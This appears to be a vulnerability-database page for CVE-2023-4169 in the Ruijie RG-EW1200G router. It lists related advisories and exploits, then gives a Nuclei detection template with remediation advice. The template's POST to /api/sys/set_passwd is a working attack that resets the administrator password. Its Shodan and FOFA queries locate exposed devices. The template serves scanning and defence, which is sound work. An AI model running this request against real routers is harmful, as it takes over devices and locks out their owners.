| Title | Published | Views | Reporter |
|---|---|---|---|
| Exploit for Improper Access Control in Ruijie Rg-Ew1200G_Firmware | 16 Oct 2023 05:08 | – | githubexploit |
| Exploit for Improper Authentication in Ruijienetworks Rg-Ew1200G_Firmware | 16 Oct 2023 05:08 | – | githubexploit |
| Exploit for Improper Authentication in Ruijienetworks Rg-Ew1200G_Firmware | 16 Oct 2023 05:08 | – | githubexploit |
| Exploit for Improper Access Control in Ruijie Rg-Ew1200G_Firmware | 16 Oct 2023 05:08 | – | githubexploit |
| CVE-2023-4169 | 5 Aug 2023 22:11 | – | circl |
| Ruijie Networks RG-EW1200G Access Control Error Vulnerability | 5 Aug 2023 00:00 | – | cnnvd |
| CVE-2023-4169 | 5 Aug 2023 18:00 | – | cve |
| CVE-2023-4169 Ruijie RG-EW1200G Administrator Password set_passwd access control | 5 Aug 2023 18:00 | – | cvelist |
| CVE-2023-4169 | 5 Aug 2023 18:15 | – | nvd |
| CVE-2023-4169 | 5 Aug 2023 18:15 | – | osv |

```yaml
id: CVE-2023-4169
info:
  name: Ruijie RG-EW1200G Router - Password Reset
  author: DhiyaneshDK
  severity: high
  description: |
    A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely.
  impact: |
    Authenticated low-privilege attackers can reset the administrator password through /api/sys/set_passwd endpoint due to improper access controls, allowing complete takeover of the Ruijie RG-EW1200G router.
  remediation: |
    Update Ruijie RG-EW1200G firmware to a version newer than 1.0(1)B1P5 that implements proper authorization checks requiring administrator privileges for password reset operations.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4169
    - https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G
    - https://vuldb.com/?ctiid.236185
    - https://vuldb.com/?id.236185
    - https://github.com/20142995/sectool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-4169
    cwe-id: CWE-284,NVD-CWE-noinfo
    epss-score: 0.47109
    epss-percentile: 0.98689
    cpe: cpe:2.3:o:ruijie:rg-ew1200g_firmware:1.0\(1\)b1p5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ruijie
    product: rg-ew1200g_firmware
    shodan-query: http.html:"app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
    fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
  tags: cve,cve2023,ruijie,router,intrusive,vkev,vuln
variables:
  password: "{{rand_base(8)}}"
http:
  - method: POST
    path:
      - "{{BaseURL}}/api/sys/set_passwd"
    body: |
      {
        "username":"web",
        "admin_new":"{{password}}"
      }
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"result":"ok"'
      - type: word
        part: header
        words:
          - application/json
      - type: status
        status:
          - 200
# digest: 4b0a0048304602210085d8c378c112503efdfea26449d4a75ebb02548a0c806c61f2907f429d6c14ff022100e6e23a15dd6e9a717689546ff4088b519bc54ff4b74a6e9a3e6f09b38e56d1b0:922c64590222798bb761d5b6d8e72950
```